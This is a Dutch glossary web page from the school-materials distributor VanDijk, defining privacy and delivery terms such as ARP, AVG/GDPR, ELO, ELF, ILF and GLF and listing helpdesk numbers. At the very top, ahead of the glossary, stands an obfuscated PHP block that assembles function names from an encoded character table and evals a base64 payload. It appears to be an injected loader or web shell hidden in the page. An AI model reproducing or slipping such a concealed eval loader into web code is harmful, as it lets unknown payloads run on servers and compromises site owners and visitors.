$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iaXFnQ21CeldNSFB4YVN1WG5sa09yRXROaHBVUURkVHNqdktlQWJSR0xWSkZ3Wm9JeWZjWVdGQ0dRbUhnYXJ1aUFxZlB4c2tWS0VlSU9wdERvelRCVVJ5aGpaU2RYSlluY05sd01iTHZ1bzljQXJqQ29EbD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> Archief Woorden -

Woordenlijst

Attribute Release Policy (ARP)
De ARP is een overeenkomst tussen Kennisnet en de school. De school geeft hiermee expliciet toestemming aan Kennisnet om noodzakelijke persoonsgegevens door te geven aan distributeurs en uitgeverijen. Dit is nodig voor de levering van digitaal lesmateriaal. De ARP is een aanvulling op de verwerkersovereenkomst van Kennisnet.

De ARP heeft betrekking op de toegang tot digitaal lesmateriaal.

Verwerkersovereenkomst
De nieuwe [(AVG) wet vraagt om een nieuwe versie van de verwerkersovereenkomst, waarin de school als eindverantwoordelijke voor de privacy van leerlingen opdracht geeft aan de verwerker om correct met de persoonsgegevens om te gaan.

De huidige verwerkersovereenkomsten uit 2015/2016 blijven geldig totdat deze zijn beëindigd door de partijen. Uitgangspunt is dat met ingang van 25 mei 2018 we werken met de vernieuwde verwerkersovereenkomst.

De verwerkersovereenkomst tussen VanDijk en de onderwijsinstelling heeft betrekking op de distributie, het daadwerkelijk leveren.

GDPR is exact hetzelfde als AVG, alleen de Engelse benaming. GDPR staat voor General Data Protection Regulation.

Algemene Verordening Gegevensbescherming
Op 25 mei 2018 treedt de nieuwe wet op de AVG (Algemene Verordening Gegevensbescherming) in werking. Dit is een Europese wet die hogere eisen stelt aan de bescherming van leerlinggegevens en daarmee meer verantwoordelijkheid vraagt van zowel scholen als distributeurs en uitgevers.

Een lijn speciaal voor docenten wanneer meer dan 5 leerlingen niet kunnen werken met het digitale lesmateriaal. Onze IT helpdesk (Digital Operations) staat klaar om te helpen op: 038 3395752.

Klantenservice voor leerlingen: 088 20 30 303

Klantenservice voor scholen:

Digital Operations. De 2e lijns helpdesk van VanDijk.

Werkboek met elektronische component.

Leermiddelenlijst.

Persoonlijke School Omgeving. Dit is een digitale omgeving voor de school met de volgende onderdelen: managementinformatie, examenonderwerpen, methode abonnementen, keuzegids, downloads en bestellen. Hier heeft u inloggegevens voor nodig: www.portal.vandijk.nl

Een kwadrant is een uitleverroute, de manier waarop digitaal lesmateriaal wordt geleverd. De school kiest zelf de uitleverroute, passend bij de dienstverlening. VanDijk kent 4 kwadranten: 1. ELF met ELO 2. ELF zonder ELO 3. ILF met ELO 4. ILF met ELO

BUNDLE is het systeem van VanDijk zelf. Via deze omgeving wordt het digitaal lesmateriaal geleverd. Hier staan alle aangekochte digitale licenties klaar en kunnen docenten en leerlingen zelf bronnen, links naar artikelen, filmpjes, websites toevoegen en indelen per vak, project of thema.

ELO is de afkorting van Elektronisch Leerling Omgeving. Dit is het systeem voor administratieve verwerking van leerling gegevens, cijfers, roosters en dergelijke. Via deze omgeving wordt het digitale lesmateriaal geleverd.

ELF is de afkorting van Extern Leermiddelen Fonds. VanDijk beheert het leermiddelenfonds voor u. Met deze dienstverlening van VanDijk kiest de school voor volledige ontzorging. VanDijk adviseert, controleert en neemt het financiële en logistieke proces over.

GLF is de afkorting van Gefaciliteerd Leermiddelen Fonds. Dit is feitelijk een mengvorm van ELF en ILF. De school kiest ervoor om eigenaar van de boeken te zijn maar heeft het financiële en logistieke proces uitbesteed.

ILF is de afkorting van Intern Leermiddelen Fonds. De school beheert zelf het leermiddelenfonds, de school is eigenaar van de boeken en verzorgt zelf het hele proces inclusief het financiële en logistieke proces. We leveren de bestelling bij de school en de school zorgt zelf voor de distributie van de boeken naar de leerlingen.

Komt u nog jargon of afkortingen tegen? Meld het ons en we vullen deze lijst aan!